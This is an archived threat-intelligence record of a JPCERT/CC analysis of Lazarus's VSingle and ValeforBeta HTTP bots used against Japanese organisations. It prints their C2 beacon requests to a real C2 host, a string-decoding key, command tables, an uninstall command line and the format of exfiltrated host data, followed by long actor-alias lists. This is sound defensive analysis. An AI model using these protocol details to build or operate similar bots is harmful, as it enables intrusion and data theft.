{
	"id": "061929b5-acaa-4c80-af42-cca5a9518fd2",
	"created_at": "2026-04-06T00:21:56.037041Z",
	"updated_at": "2026-04-10T13:11:29.948587Z",
	"deleted_at": null,
	"sha1_hash": "38bbcccb57987dc9471da4684601574024179fd6",
	"title": "Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta) - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 874686,
	"plain_text": "Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta) -\r\nJPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2021-03-21 · Archived: 2026-04-05 15:27:11 UTC\r\nLazarus\r\nThe attack group Lazarus (also known as Hidden Cobra) conducts various attack operations. This article\r\nintroduces malware (VSingle and ValeforBeta) and tools used in attacks against Japanese organisations.\r\nVSingle overview\r\nVSingle is an HTTP bot which executes arbitrary code from a remote network. It also downloads and executes\r\nplugins.\r\nOnce launched, this malware runs Explorer and executes its main code through DLL injection. (Some samples do\r\nnot perform DLL injection.) The main code contains the following PDB path:\r\nG:\\Valefor\\Valefor_Single\\Release\\VSingle.pdb\r\nThe next sections describe VSingle's obfuscation technique and communication format.\r\nVSingle obfuscation technique\r\nMost of the strings in VSingle are obfuscated. Figure 1 shows the code to disable obfuscation. A fixed key value\r\n(o2pq0qy4ymcrbe4s) decodes the strings by XOR.\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 1 of 12\n\nFigure 1: Code to disable obfuscation in VSingle\r\nBelow are some of the decoded strings:\r\n[+] Download Parameter Error\r\n[+] Download Result\r\n[+] Upload Result\r\n[+] Upload Parameter Error\r\n[+] Interval\r\n Interval was set to\r\n[+] Plugin Download Result\r\n[+] Update\r\n[+] Info\r\n[+] Uninstall\r\n Valefor was uninstalled successfully.\r\n[+] Executable Download Result\r\n[+] Executable Download Parameter Error\r\nufw=%s\u0026uis=%u\r\ncmd.exe /c %s\r\n[%02d-%02d-%04d %02d:%02d:%02d]\r\n[+] Plugin Execute Result\r\nVSingle communication with C2 servers\r\nBelow is the HTTP GET request that VSingle sends to its C2 server at the beginning of the communication.\r\nGET /polo/[Unix time]/[random string].php?ufw=[Base64 data]\u0026uis=[unique ID] HTTP/1.1\r\nHost: maturicafe.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\r\nAccept: text/html3,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[Base64 data] contains the Base64-encoded value of \"[IP address]|[Windows version number]|[version]\". As a\r\nresponse to this request, AES-encrypted data including commands is downloaded from the server. The encryption\r\nkey is specified in the Set-Cookie header in the response.\r\nVSingle also works with an authentication proxy (Basic authentication). 
If the malware contains proxy settings, it can\r\ncommunicate in a proxy environment as follows:\r\nGET https://maturicafe.com/polo/[Unix time]/[random string].php?ufw=[Base64 data]\u0026uis=[unique ID] HTT\r\nHost: maturicafe.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\r\nProxy-Connection: keep-alive\r\nProxy-Authorization: Basic [credential]\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nVSingle functions\r\nVSingle has 8 simple functions as listed below:\r\nTable 1: VSingle commands\r\nCommand number Contents\r\n1 Upload file\r\n2 Set communication interval\r\n3 Execute arbitrary command\r\n4 Download/execute plugin\r\n5 Update\r\n6 Send malware information\r\n7 Uninstall\r\n8 Download file\r\nIt executes the following 4 types of plugins:\r\nWindows PE file (saved as a .tmp file)\r\nVBS file (saved as a .vbs file)\r\nBAT file (saved as a .bat file)\r\nShellcode\r\nFigure 2 shows a part of the code to execute a plugin.\r\nFigure 2: Part of VSingle code to execute a plugin\r\nPlugins are temporarily saved in the %TEMP% folder and then executed, except for shellcode plugins: these are also\r\nsaved in the %TEMP% folder but are loaded and executed in memory.\r\nWhen the command number 6 (sending malware information) is selected, the data in Figure 3 is sent. As for the\r\nversion number, 4.1.1, 3.0.1 and others have been confirmed in addition to 1.0.1. It is possible that this number\r\nindicates some sort of identifier, rather than its malware version.\r\nFigure 3: Sample information sent with command number 6\r\nValeforBeta overview\r\nValeforBeta is an HTTP bot developed in Delphi, and its functions are even simpler than those of VSingle. Besides\r\narbitrary code execution from a remote network, it just uploads and downloads files.\r\nThe next sections describe ValeforBeta's configuration and communication format.\r\nValeforBeta configuration\r\nFigure 4 shows the code to load the configuration. It contains a sample ID (\"512\" in Figure 4), access type and\r\nintervals, as well as C2 server information.\r\nFigure 4: ValeforBeta configuration\r\nThere are 3 different access types:\r\nConnect directly (INTERNET_OPEN_TYPE_DIRECT)\r\nUse default setting (INTERNET_OPEN_TYPE_PRECONFIG)\r\nConnect via proxy (INTERNET_OPEN_TYPE_PROXY)\r\nValeforBeta communication with C2 servers\r\nBelow is the HTTP POST request that ValeforBeta sends to its C2 server at the beginning of the communication.\r\nPOST /doc/total.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: JSESSIONID=[Base64 data]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2\r\nHost: 3.90.97.16\r\nContent-Length: 0\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nAlthough it is an HTTP POST request, it does not contain any data to send. The Base64-encoded data after\r\n\"JSESSIONID=\" in the Cookie header contains the information of an infected host. Below is the format of the\r\nBase64-encoded data.\r\n[8-letter random string][data][random string (4-12 letters)]\r\n[data] contains the version information of the malware and the IP address of the infected host. (See request type\r\n\"0\" in Appendix A for more details.) If the response from the server is \"200 OK\", the next request is sent (Request\r\ntype \"1\").\r\nThe C2 server sends data including commands. The result of the command execution is sent as a part of the HTTP\r\nPOST request, disguised as a BMP file. 
Figure 5 shows part of the code to send the command execution result.\r\nFigure 5: ValeforBeta's code to send command execution result\r\nValeforBeta functions\r\nValeforBeta has only 6 functions as listed in Table 2.\r\nTable 2: ValeforBeta commands\r\nCommand number Contents\r\n1 Download file\r\n2 Upload file\r\n3 Execute arbitrary shell command\r\n4 Uninstall (Executes cmd /c ping -n 4 127.0.0.1 \u003eNUL \u0026 echo VFB \u003e \"file name of itself\")\r\n6 Set Sleep Time\r\n7 Send system information\r\nThe command execution result is XOR-encoded. Figure 6 shows the decoded string of data sent with command\r\nnumber 7 (sending system information).\r\nFigure 6: Sample data sent by ValeforBeta\r\nTools used after intrusion\r\nThe attackers use the following 3 tools in this operation in order to relay communication with the C2 server.\r\n3Proxy\r\nStunnel\r\nPlink\r\nIn closing\r\nWe introduced malware and tools that Lazarus used in the operation against Japanese organisations. We will\r\nprovide an update if we find new types of malware.\r\nThe C2 servers connected to the samples described in this article are listed in Appendix B. Please make sure that\r\nnone of your devices is communicating with them.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nAppendix A: Data sent by ValeforBeta\r\nTable A: Format of data sent\r\nOffset Length Contents\r\n0x00 1 Request type (0: Send client data, 1: Request a command, 2: Send command execution result)\r\n0x01 4 Client ID (generated from hostname, username, OS install date/time and MAC address)\r\n0x05 3 Malware version\r\n0x08 4 IP address\r\n0x0C 3 OS version\r\nData after 0x05 is XOR-encoded and added only for the request type \"0\".\r\nAppendix B: C2 servers\r\nAppendix C: Malware hash value\r\n487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e\r\neb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html"
	],
	"report_names": [
		"Lazarus_malware3.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434916,
	"ts_updated_at": 1775826689,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.pdf",
		"text": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.txt",
		"img": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.jpg"
	}
}